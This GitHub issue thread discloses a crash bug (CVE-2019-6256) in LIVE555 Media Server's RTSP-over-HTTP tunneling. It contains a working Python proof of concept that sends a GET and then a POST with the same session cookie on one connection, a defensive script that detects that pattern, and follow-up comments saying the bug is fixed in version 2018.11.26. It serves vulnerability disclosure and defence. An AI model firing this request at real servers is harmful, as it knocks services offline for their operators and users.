There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93. #19

Closed
DshtAnger opened this issue Jan 14, 2019 · 3 comments

DshtAnger commented Jan 14, 2019

ISSUE DESCRIPTION

The project website : http://www.live555.com/liveMedia/

I found a new way to make RTSPServer crash in the latest version 0.93 when RTSP-over-HTTP tunneling is supported.

I only need to send two HTTP requests in one TCP connection.

The problem occurs in RTSPServer.cpp:853, where it calls handleHTTPCmd_TunnelingPOST.

If I first send an HTTP GET packet with a specific sessionCookie and then send an HTTP POST packet with this sessionCookie in the same TCP connection, RTSPServer will call an erroneous virtual function pointer in the readSocket function (GroupsockHelper.cpp), and the pointer value comes from the heap, which may be controlled.

Attack PoC python code:

```python
from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554  # or 8554

tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))

http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''

http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

tcp.send(http_request_GET)
data = tcp.recv(1024)

tcp.send(http_request_POST)
tcp.close()
```

You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.

Original vulnerability discoverer:
许彬彬 Xubinbin

IMPACT

It will cause a DoS attack and potential remote command execution in version 0.93 (I verified), and even in all earlier versions (this is just my unverified guess).
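A detection sketch for the pattern reported above, added here as an example and not part of the original issue or the LIVE555 code: legitimate RTSP-over-HTTP tunneling carries the GET and the POST on two separate TCP connections, so a single connection that carries both with the same `x-sessioncookie` is worth flagging. It assumes reassembled client-to-server bytes are available per connection (for example from a proxy or packet capture); the connection ids and payloads are constructed samples.

```python
import re
from collections import defaultdict

REQUEST_LINE = re.compile(rb"^(GET|POST) \S+ HTTP/1\.[01]\r?$", re.M)
COOKIE = re.compile(rb"^x-sessioncookie:[ \t]*(\S+)", re.I | re.M)

def tunnel_requests(stream):
    """Yield (method, cookie) for each HTTP request in one client->server stream."""
    matches = list(REQUEST_LINE.finditer(stream))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(stream)
        # Only the header block (up to the first blank line) is searched.
        headers = re.split(rb"\r?\n\r?\n", stream[m.start():end], maxsplit=1)[0]
        cookie = COOKIE.search(headers)
        if cookie:
            yield m.group(1).decode(), cookie.group(1).decode("latin-1")

def same_connection_reuse(streams):
    """Return {conn_id: [cookie, ...]} where one connection sent GET and POST with one cookie."""
    alerts = {}
    for conn_id, data in streams.items():
        seen = defaultdict(set)
        for method, cookie in tunnel_requests(data):
            seen[cookie].add(method)
        hits = sorted(c for c, methods in seen.items() if methods == {"GET", "POST"})
        if hits:
            alerts[conn_id] = hits
    return alerts

# Constructed sample data: the first two connections form a normal tunnel
# (GET and POST on separate connections); the third reuses one connection.
SAMPLE_STREAMS = {
    "198.51.100.7:40112": b"GET / HTTP/1.1\r\nx-sessioncookie: cookieA\r\n"
                          b"Accept: application/x-rtsp-tunnelled\r\n\r\n",
    "198.51.100.7:40113": b"POST / HTTP/1.1\r\nx-sessioncookie: cookieA\r\n"
                          b"Content-Type: application/x-rtsp-tunnelled\r\n\r\nZGF0YQ==",
    "203.0.113.9:51000": b"GET / HTTP/1.1\r\nx-sessioncookie: cookieB\r\n"
                         b"Accept: application/text\r\n\r\n"
                         b"POST / HTTP/1.1\r\nx-sessioncookie: cookieB\r\n"
                         b"Accept: application/text\r\n\r\nsample body\r\n",
}

if __name__ == "__main__":
    for conn, cookies in same_connection_reuse(SAMPLE_STREAMS).items():
        print(f"ALERT {conn}: GET and POST share x-sessioncookie {cookies}")
```
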

@nluedtke

This was assigned CVE-2019-6256.

carnil commented Jan 19, 2019

According to the Debian maintainer in https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=919529#17, it does not seem to be present in current versions.

What was the fix for the issue?

DshtAnger commented Jan 21, 2019

> According to the Debian maintainer in https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=919529#17, it does not seem to be present in current versions.
>
> What was the fix for the issue?

Ross Finlayson [finlayson@live555.com] told me that the problem has been fixed in version 2018.11.26.
Users only need to update the version.
Reference: http://www.live555.com/liveMedia/public/changelog.txt
